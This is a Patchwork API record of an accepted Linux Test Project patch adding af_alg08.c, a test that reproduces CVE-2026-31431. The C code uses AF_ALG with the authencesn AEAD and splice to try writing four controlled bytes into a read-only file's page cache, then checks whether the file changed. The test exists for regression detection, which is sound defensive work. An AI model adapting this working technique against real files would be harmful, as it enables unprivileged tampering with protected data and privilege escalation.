Patch Detail
get:
Show a patch.
patch:
Update a patch.
put:
Update a patch.
GET /api/patches/2231285/?format=api
{ "id": 2231285, "url": "http://patchwork.ozlabs.org/api/patches/2231285/?format=api", "web_url": "http://patchwork.ozlabs.org/project/ltp/patch/20260430-cve-2026-31431-v2-2-1136c09ca67b@suse.com/", "project": { "id": 59, "url": "http://patchwork.ozlabs.org/api/projects/59/?format=api", "name": "Linux Test Project development", "link_name": "ltp", "list_id": "ltp.lists.linux.it", "list_email": "ltp@lists.linux.it", "web_url": "", "scm_url": "", "webscm_url": "", "list_archive_url": "", "list_archive_url_format": "", "commit_url_format": "" }, "msgid": "<20260430-cve-2026-31431-v2-2-1136c09ca67b@suse.com>", "list_archive_url": null, "date": "2026-04-30T13:30:17", "name": "[v2,2/2] cve-2026-31431: Add page cache corruption reproducer", "commit_ref": null, "pull_url": null, "state": "accepted", "archived": false, "hash": "a8bc8b1f234f8de28930cceb08201e6ff1b159c5", "submitter": { "id": 83220, "url": "http://patchwork.ozlabs.org/api/people/83220/?format=api", "name": "Andrea Cervesato", "email": "andrea.cervesato@suse.de" }, "delegate": null, "mbox": "http://patchwork.ozlabs.org/project/ltp/patch/20260430-cve-2026-31431-v2-2-1136c09ca67b@suse.com/mbox/", "series": [ { "id": 502306, "url": "http://patchwork.ozlabs.org/api/series/502306/?format=api", "web_url": "http://patchwork.ozlabs.org/project/ltp/list/?series=502306", "date": "2026-04-30T13:30:15", "name": "cve-2026-31431 reproducer", "version": 2, "mbox": "http://patchwork.ozlabs.org/series/502306/mbox/" } ], "comments": "http://patchwork.ozlabs.org/api/patches/2231285/comments/", "check": "success", "checks": "http://patchwork.ozlabs.org/api/patches/2231285/checks/", "tags": {}, "related": [], "headers": { "Return-Path": "<ltp-bounces+incoming=patchwork.ozlabs.org@lists.linux.it>", "X-Original-To": [ "incoming@patchwork.ozlabs.org", "ltp@lists.linux.it" ], "Delivered-To": [ "patchwork-incoming@legolas.ozlabs.org", "ltp@picard.linux.it" ], "Authentication-Results": [ "legolas.ozlabs.org;\n\tdkim=fail reason=\"signature verification failed\" (1024-bit key;\n unprotected) header.d=suse.de header.i=@suse.de header.a=rsa-sha256\n header.s=susede2_rsa header.b=m2g9N3rD;\n\tdkim=fail reason=\"signature verification failed\" header.d=suse.de\n header.i=@suse.de header.a=ed25519-sha256 header.s=susede2_ed25519\n header.b=WHEYTyg4;\n\tdkim=fail reason=\"signature verification failed\" (1024-bit key)\n header.d=suse.de header.i=@suse.de header.a=rsa-sha256 header.s=susede2_rsa\n header.b=vpyuFkOu;\n\tdkim=neutral header.d=suse.de header.i=@suse.de header.a=ed25519-sha256\n header.s=susede2_ed25519 header.b=rqk9mvMM;\n\tdkim-atps=neutral", "legolas.ozlabs.org;\n spf=pass (sender SPF authorized) smtp.mailfrom=lists.linux.it\n (client-ip=2001:1418:10:5::2; helo=picard.linux.it;\n envelope-from=ltp-bounces+incoming=patchwork.ozlabs.org@lists.linux.it;\n receiver=patchwork.ozlabs.org)", "smtp-out2.suse.de;\n dkim=pass header.d=suse.de header.s=susede2_rsa header.b=vpyuFkOu;\n dkim=pass header.d=suse.de header.s=susede2_ed25519 header.b=rqk9mvMM" ], "Received": [ "from picard.linux.it (picard.linux.it [IPv6:2001:1418:10:5::2])\n\t(using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits)\n\t key-exchange x25519)\n\t(No client certificate requested)\n\tby legolas.ozlabs.org (Postfix) with ESMTPS id 4g5w6h1KcLz1yGq\n\tfor <incoming@patchwork.ozlabs.org>; Thu, 30 Apr 2026 23:31:08 +1000 (AEST)", "from picard.linux.it (localhost [IPv6:::1])\n\tby picard.linux.it (Postfix) with ESMTP id 1EB8D3E6C86\n\tfor <incoming@patchwork.ozlabs.org>; Thu, 30 Apr 2026 15:31:06 +0200 (CEST)", "from in-7.smtp.seeweb.it (in-7.smtp.seeweb.it [217.194.8.7])\n (using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits)\n key-exchange X25519 server-signature ECDSA (secp384r1))\n (No client certificate requested)\n by picard.linux.it (Postfix) with ESMTPS id EC1173E6C96\n for <ltp@lists.linux.it>; Thu, 30 Apr 2026 15:30:26 +0200 (CEST)", "from smtp-out2.suse.de (smtp-out2.suse.de\n [IPv6:2a07:de40:b251:101:10:150:64:2])\n (using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits)\n key-exchange X25519 server-signature RSA-PSS (2048 bits) server-digest\n SHA256)\n (No client certificate requested)\n by in-7.smtp.seeweb.it (Postfix) with ESMTPS id 3202A200D07\n for <ltp@lists.linux.it>; Thu, 30 Apr 2026 15:30:26 +0200 (CEST)", "from imap1.dmz-prg2.suse.org (imap1.dmz-prg2.suse.org\n [IPv6:2a07:de40:b281:104:10:150:64:97])\n (using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits)\n key-exchange X25519 server-signature RSA-PSS (4096 bits) server-digest\n SHA256)\n (No client certificate requested)\n by smtp-out2.suse.de (Postfix) with ESMTPS id 19BAB5BD7F;\n Thu, 30 Apr 2026 13:30:20 +0000 (UTC)", "from imap1.dmz-prg2.suse.org (localhost [127.0.0.1])\n (using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits)\n key-exchange X25519 server-signature RSA-PSS (4096 bits) server-digest\n SHA256)\n (No client certificate requested)\n by imap1.dmz-prg2.suse.org (Postfix) with ESMTPS id ED288593B2;\n Thu, 30 Apr 2026 13:30:19 +0000 (UTC)", "from dovecot-director2.suse.de ([2a07:de40:b281:106:10:150:64:167])\n by imap1.dmz-prg2.suse.org with ESMTPSA id yMRiOGtZ82luOAAAD6G6ig\n (envelope-from <andrea.cervesato@suse.de>); Thu, 30 Apr 2026 13:30:19 +0000" ], "DKIM-Signature": [ "v=1; a=rsa-sha256; c=relaxed/relaxed; d=suse.de;\n s=susede2_rsa;\n t=1777555821;\n h=from:from:reply-to:date:date:message-id:message-id:to:to:cc:cc:\n mime-version:mime-version:content-type:content-type:\n content-transfer-encoding:content-transfer-encoding:\n in-reply-to:in-reply-to:references:references;\n bh=TAatmm58bcOgsOVjOmnTvNAuT/7yEV7IfwC5c1HHrR8=;\n b=m2g9N3rDg7+EzJwMDEShvl9fMM++bdgFR9KOCE+cMj/z4i5GomtrGM0zUYyS106Xn/f87I\n vRkaujF3V3IHnb/VA4hWorM00aNanWeXArbzlaFMRAXiVv4oSGQyXgHsIjpUOM7+U8GpiR\n fmSWA9QoUbfaBEpTHGdbWVqyFs2sLYI=", "v=1; a=ed25519-sha256; c=relaxed/relaxed; d=suse.de;\n s=susede2_ed25519; t=1777555821;\n h=from:from:reply-to:date:date:message-id:message-id:to:to:cc:cc:\n mime-version:mime-version:content-type:content-type:\n content-transfer-encoding:content-transfer-encoding:\n in-reply-to:in-reply-to:references:references;\n bh=TAatmm58bcOgsOVjOmnTvNAuT/7yEV7IfwC5c1HHrR8=;\n b=WHEYTyg4CFlK9UbkoyzU9bOKg6Kkis4qM6UouVle3h4RdQgWFlvql0JlLFT6glf9F31jKl\n 5cQXpQS7pW9J0dBA==", "v=1; a=rsa-sha256; c=relaxed/relaxed; d=suse.de;\n s=susede2_rsa;\n t=1777555820;\n h=from:from:reply-to:date:date:message-id:message-id:to:to:cc:cc:\n mime-version:mime-version:content-type:content-type:\n content-transfer-encoding:content-transfer-encoding:\n in-reply-to:in-reply-to:references:references;\n bh=TAatmm58bcOgsOVjOmnTvNAuT/7yEV7IfwC5c1HHrR8=;\n b=vpyuFkOuJ4C/l48g7C/gWUVLYHckNp+mLUq1gK4fAyuy2Gl8KoiYjUhffS1Jq4IuBtFT36\n sRHG8pgxzeDSvjjkqQUFL25pETD2NT7W+Zu4/CcdlptpXuU0mzjHViHT5+WajY8nGYHnC9\n e7Ye0sx+N3P8QMjkQ6i+cfh30xiDn4Q=", "v=1; a=ed25519-sha256; c=relaxed/relaxed; d=suse.de;\n s=susede2_ed25519; t=1777555820;\n h=from:from:reply-to:date:date:message-id:message-id:to:to:cc:cc:\n mime-version:mime-version:content-type:content-type:\n content-transfer-encoding:content-transfer-encoding:\n in-reply-to:in-reply-to:references:references;\n bh=TAatmm58bcOgsOVjOmnTvNAuT/7yEV7IfwC5c1HHrR8=;\n b=rqk9mvMMkerH4Eucyi/lOxfli0iJDjmWaAkBkVGVhW6Oq/6XEdsavtebVwXwipJiSVk/hR\n IeY9VMrglhmhWrCg==" ], "From": "Andrea Cervesato <andrea.cervesato@suse.de>", "Date": "Thu, 30 Apr 2026 15:30:17 +0200", "MIME-Version": "1.0", "Message-Id": "<20260430-cve-2026-31431-v2-2-1136c09ca67b@suse.com>", "References": "<20260430-cve-2026-31431-v2-0-1136c09ca67b@suse.com>", "In-Reply-To": "<20260430-cve-2026-31431-v2-0-1136c09ca67b@suse.com>", "To": "Linux Test Project <ltp@lists.linux.it>", "X-Mailer": "b4 0.14.2", "X-Developer-Signature": "v=1; a=ed25519-sha256; t=1777555819; l=6288;\n i=andrea.cervesato@suse.com; s=20251210; h=from:subject:message-id;\n bh=AnYobZyCgFzEMbhIPiSeDRN6bAB7ADvKYARLiIZ8JBU=;\n b=JzDVuEoBwBF+7OiScOB4G8Km3QhWA7bfnt9MdzDDv3w16s8sLvZpqQQNF6A3hmZp5cHbNll7/\n 8bL3eho20YIA4tacWueaceygHdvvOKCL1T5IRoe9IEvFeMy9HDG9MEh", "X-Developer-Key": "i=andrea.cervesato@suse.com; a=ed25519;\n pk=zKY+6GCauOiuHNZ//d8PQ/UL4jFCTKbXrzXAOQSLevI=", "X-Spamd-Result": "default: False [-4.51 / 50.00]; BAYES_HAM(-3.00)[100.00%];\n NEURAL_HAM_LONG(-1.00)[-1.000];\n R_DKIM_ALLOW(-0.20)[suse.de:s=susede2_rsa,suse.de:s=susede2_ed25519];\n NEURAL_HAM_SHORT(-0.20)[-1.000]; MIME_GOOD(-0.10)[text/plain];\n MX_GOOD(-0.01)[]; RCVD_TLS_ALL(0.00)[];\n FUZZY_RATELIMITED(0.00)[rspamd.com];\n RCVD_VIA_SMTP_AUTH(0.00)[]; MIME_TRACE(0.00)[0:+];\n ARC_NA(0.00)[];\n SPAMHAUS_XBL(0.00)[2a07:de40:b281:104:10:150:64:97:from];\n DWL_DNSWL_BLOCKED(0.00)[suse.de:dkim];\n DNSWL_BLOCKED(0.00)[2a07:de40:b281:104:10:150:64:97:from,2a07:de40:b281:106:10:150:64:167:received];\n DKIM_SIGNED(0.00)[suse.de:s=susede2_rsa,suse.de:s=susede2_ed25519];\n FROM_EQ_ENVFROM(0.00)[]; FROM_HAS_DN(0.00)[];\n RCPT_COUNT_THREE(0.00)[3]; RCVD_COUNT_TWO(0.00)[2];\n TO_MATCH_ENVRCPT_ALL(0.00)[];\n DBL_BLOCKED_OPENRESOLVER(0.00)[imap1.dmz-prg2.suse.org:helo,imap1.dmz-prg2.suse.org:rdns,suse.de:dkim,suse.com:mid,suse.com:email];\n TO_DN_ALL(0.00)[]; DKIM_TRACE(0.00)[suse.de:+]", "X-Rspamd-Action": "no action", "X-Spam-Score": "-4.51", "X-Spam-Level": "", "X-Rspamd-Server": "rspamd1.dmz-prg2.suse.org", "X-Rspamd-Queue-Id": "19BAB5BD7F", "X-Spam-Status": "No, score=0.1 required=7.0 tests=DKIM_SIGNED,DKIM_VALID,\n DKIM_VALID_AU,DKIM_VALID_EF,SPF_HELO_NONE,SPF_PASS shortcircuit=no\n autolearn=disabled version=4.0.1", "X-Spam-Checker-Version": "SpamAssassin 4.0.1 (2024-03-25) on in-7.smtp.seeweb.it", "X-Virus-Scanned": "clamav-milter 1.0.9 at in-7.smtp.seeweb.it", "X-Virus-Status": "Clean", "Subject": "[LTP] [PATCH v2 2/2] cve-2026-31431: Add page cache corruption\n reproducer", "X-BeenThere": "ltp@lists.linux.it", "X-Mailman-Version": "2.1.29", "Precedence": "list", "List-Id": "Linux Test Project <ltp.lists.linux.it>", "List-Unsubscribe": "<https://lists.linux.it/options/ltp>,\n <mailto:ltp-request@lists.linux.it?subject=unsubscribe>", "List-Archive": "<http://lists.linux.it/pipermail/ltp/>", "List-Post": "<mailto:ltp@lists.linux.it>", "List-Help": "<mailto:ltp-request@lists.linux.it?subject=help>", "List-Subscribe": "<https://lists.linux.it/listinfo/ltp>,\n <mailto:ltp-request@lists.linux.it?subject=subscribe>", "Content-Type": "text/plain; charset=\"us-ascii\"", "Content-Transfer-Encoding": "7bit", "Errors-To": "ltp-bounces+incoming=patchwork.ozlabs.org@lists.linux.it", "Sender": "\"ltp\" <ltp-bounces+incoming=patchwork.ozlabs.org@lists.linux.it>" }, "content": "From: Andrea Cervesato <andrea.cervesato@suse.com>\n\nA logic bug in authencesn allows an unprivileged user to corrupt\n4 bytes of page cache via AF_ALG + splice. The test writes known\ndata to a file, attempts corruption through the AEAD scratch-write\npath, and verifies whether the file content was modified.\n\nTested-by: Avinesh Kumar <avinesh.kumar@suse.com>\nSigned-off-by: Andrea Cervesato <andrea.cervesato@suse.com>\n---\n runtest/cve | 1 +\n testcases/kernel/crypto/.gitignore | 1 +\n testcases/kernel/crypto/af_alg08.c | 164 +++++++++++++++++++++++++++++++++++++\n 3 files changed, 166 insertions(+)", "diff": "diff --git a/runtest/cve b/runtest/cve\nindex c3ecd74dd9f837924b810b7b431ebb911d809966..74300fb546a071ef2d1de3a02549eed35c9a57a4 100644\n--- a/runtest/cve\n+++ b/runtest/cve\n@@ -93,3 +93,4 @@ cve-2022-0185 fsconfig03\n cve-2022-4378 cve-2022-4378\n cve-2025-38236 cve-2025-38236\n cve-2025-21756 cve-2025-21756\n+cve-2026-31431 af_alg08\ndiff --git a/testcases/kernel/crypto/.gitignore b/testcases/kernel/crypto/.gitignore\nindex 448f986a6acc1341eac052ae9663e8fe28e18d4d..aca016b62110b319eb2825669ce23f5b3608c73e 100644\n--- a/testcases/kernel/crypto/.gitignore\n+++ b/testcases/kernel/crypto/.gitignore\n@@ -5,6 +5,7 @@ af_alg04\n af_alg05\n af_alg06\n af_alg07\n+af_alg08\n pcrypt_aead01\n crypto_user01\n crypto_user02\ndiff --git a/testcases/kernel/crypto/af_alg08.c b/testcases/kernel/crypto/af_alg08.c\nnew file mode 100644\nindex 0000000000000000000000000000000000000000..06166b6244c1d72e03e3ff8d7e87b1b3b76e93a9\n--- /dev/null\n+++ b/testcases/kernel/crypto/af_alg08.c\n@@ -0,0 +1,164 @@\n+// SPDX-License-Identifier: GPL-2.0-or-later\n+/*\n+ * Copyright (C) 2026 SUSE LLC Andrea Cervesato <andrea.cervesato@suse.com>\n+ */\n+\n+/*\\\n+ * Test for CVE-2026-31431 (\"Copy Fail\") fixed in kernel v7.0:\n+ * a664bf3d603d (\"crypto: algif_aead - Separate src from dst\")\n+ *\n+ * A logic bug in authencesn, the kernel's AEAD wrapper for IPsec Extended\n+ * Sequence Numbers, allows an unprivileged user to write 4 controlled bytes\n+ * into the page cache of any readable file. During AEAD decryption,\n+ * authencesn uses the destination scatterlist as scratch space for ESN byte\n+ * rearrangement. When data is spliced from a file into an AF_ALG socket, the\n+ * 2017 in-place optimization (72548b093ee3) places page cache pages into the\n+ * writable destination scatterlist. authencesn's scratch write then corrupts\n+ * those pages.\n+ *\n+ * The test creates a file with known data, attempts page cache corruption via\n+ * the AF_ALG + splice technique, and verifies whether the file content was\n+ * modified.\n+ *\n+ * Reproducer based on:\n+ * https://github.com/theori-io/copy-fail-CVE-2026-31431\n+ */\n+\n+#include \"tst_test.h\"\n+#include \"tst_af_alg.h\"\n+#include \"lapi/socket.h\"\n+#include \"lapi/splice.h\"\n+\n+#define TESTFILE \"copy_fail\"\n+#define OVERWRITE_SIZE 4\n+#define AEAD_AUTHSIZE 4\n+#define AEAD_ASSOCLEN 8\n+#define AES_IV_SIZE 16\n+#define SPI_SIZE 4\n+\n+static const uint8_t original[OVERWRITE_SIZE] = { 'X', 'X', 'X', 'X' };\n+static const uint8_t payload[OVERWRITE_SIZE] = { 'P', 'W', 'N', 'D' };\n+\n+/*\n+ * authenc key format: struct rtattr header (8 bytes) +\n+ * HMAC-SHA256 key (16 bytes) + AES-128 key (16 bytes)\n+ */\n+static const uint8_t authenc_key[] = {\n+\t0x08, 0x00, 0x01, 0x00,\n+\t0x00, 0x00, 0x00, 0x10,\n+\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n+\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n+\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n+\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n+};\n+\n+static int algfd = -1;\n+static int reqfd = -1;\n+static int pipefd[2] = { -1, -1 };\n+static int file_fd = -1;\n+\n+static void try_corrupt(void)\n+{\n+\tconst uint8_t iv[AES_IV_SIZE] = { 0 };\n+\tuint8_t aad[AEAD_ASSOCLEN];\n+\tchar recvbuf[AEAD_ASSOCLEN];\n+\tloff_t off_in = 0;\n+\n+\talgfd = -1;\n+\treqfd = -1;\n+\tpipefd[0] = -1;\n+\tpipefd[1] = -1;\n+\n+\t/* AAD[0..3] = SPI (don't care), AAD[4..7] = ESN scratch-write zone */\n+\tmemset(aad, 'A', SPI_SIZE);\n+\tmemcpy(aad + SPI_SIZE, payload, OVERWRITE_SIZE);\n+\n+\talgfd = tst_alg_setup(\"aead\", \"authencesn(hmac(sha256),cbc(aes))\",\n+\t\t\t authenc_key, sizeof(authenc_key));\n+\tSAFE_SETSOCKOPT(algfd, SOL_ALG, ALG_SET_AEAD_AUTHSIZE, NULL,\n+\t\t\tAEAD_AUTHSIZE);\n+\n+\treqfd = tst_alg_accept(algfd);\n+\n+\tconst struct tst_alg_sendmsg_params params = {\n+\t\t.decrypt = true,\n+\t\t.iv = iv,\n+\t\t.ivlen = AES_IV_SIZE,\n+\t\t.assoclen = AEAD_ASSOCLEN,\n+\t\t.msg_flags = MSG_MORE,\n+\t};\n+\n+\ttst_alg_sendmsg(reqfd, aad, sizeof(aad), ¶ms);\n+\n+\tSAFE_PIPE(pipefd);\n+\n+\tTEST(splice(file_fd, &off_in, pipefd[1], NULL, OVERWRITE_SIZE, 0));\n+\tif (TST_RET < 0)\n+\t\ttst_brk(TBROK | TTERRNO, \"splice(file -> pipe)\");\n+\n+\tTEST(splice(pipefd[0], NULL, reqfd, NULL, OVERWRITE_SIZE, 0));\n+\tif (TST_RET < 0)\n+\t\ttst_brk(TBROK | TTERRNO, \"splice(pipe -> AF_ALG)\");\n+\n+\t/* Expected to fail (invalid ciphertext); triggers the scratch write */\n+\tTST_EXP_FAIL_SILENT(recv(reqfd, recvbuf, sizeof(recvbuf), 0), EBADMSG);\n+\n+\tSAFE_CLOSE(pipefd[0]);\n+\tSAFE_CLOSE(pipefd[1]);\n+\tSAFE_CLOSE(reqfd);\n+\tSAFE_CLOSE(algfd);\n+}\n+\n+static void run(void)\n+{\n+\tint fd;\n+\tuint8_t readback[OVERWRITE_SIZE];\n+\n+\tfd = SAFE_OPEN(TESTFILE, O_WRONLY | O_CREAT, 0444);\n+\tSAFE_WRITE(SAFE_WRITE_ALL, fd, original, OVERWRITE_SIZE);\n+\tSAFE_CLOSE(fd);\n+\n+\tfile_fd = SAFE_OPEN(TESTFILE, O_RDONLY);\n+\ttry_corrupt();\n+\tSAFE_CLOSE(file_fd);\n+\n+\tfile_fd = SAFE_OPEN(TESTFILE, O_RDONLY);\n+\tSAFE_READ(1, file_fd, readback, sizeof(readback));\n+\tSAFE_CLOSE(file_fd);\n+\n+\tif (memcmp(readback, original, OVERWRITE_SIZE) != 0)\n+\t\ttst_res(TFAIL, \"Page cache was corrupted via AF_ALG splice\");\n+\telse\n+\t\ttst_res(TPASS, \"Page cache was not corrupted\");\n+\n+\tSAFE_UNLINK(TESTFILE);\n+}\n+\n+static void cleanup(void)\n+{\n+\tif (pipefd[0] != -1)\n+\t\tSAFE_CLOSE(pipefd[0]);\n+\n+\tif (pipefd[1] != -1)\n+\t\tSAFE_CLOSE(pipefd[1]);\n+\n+\tif (reqfd != -1)\n+\t\tSAFE_CLOSE(reqfd);\n+\n+\tif (algfd != -1)\n+\t\tSAFE_CLOSE(algfd);\n+\n+\tif (file_fd != -1)\n+\t\tSAFE_CLOSE(file_fd);\n+}\n+\n+static struct tst_test test = {\n+\t.test_all = run,\n+\t.cleanup = cleanup,\n+\t.needs_tmpdir = 1,\n+\t.tags = (const struct tst_tag[]) {\n+\t\t{\"linux-git\", \"a664bf3d603d\"},\n+\t\t{\"CVE\", \"2026-31431\"},\n+\t\t{}\n+\t},\n+};\n", "prefixes": [ "v2", "2/2" ] }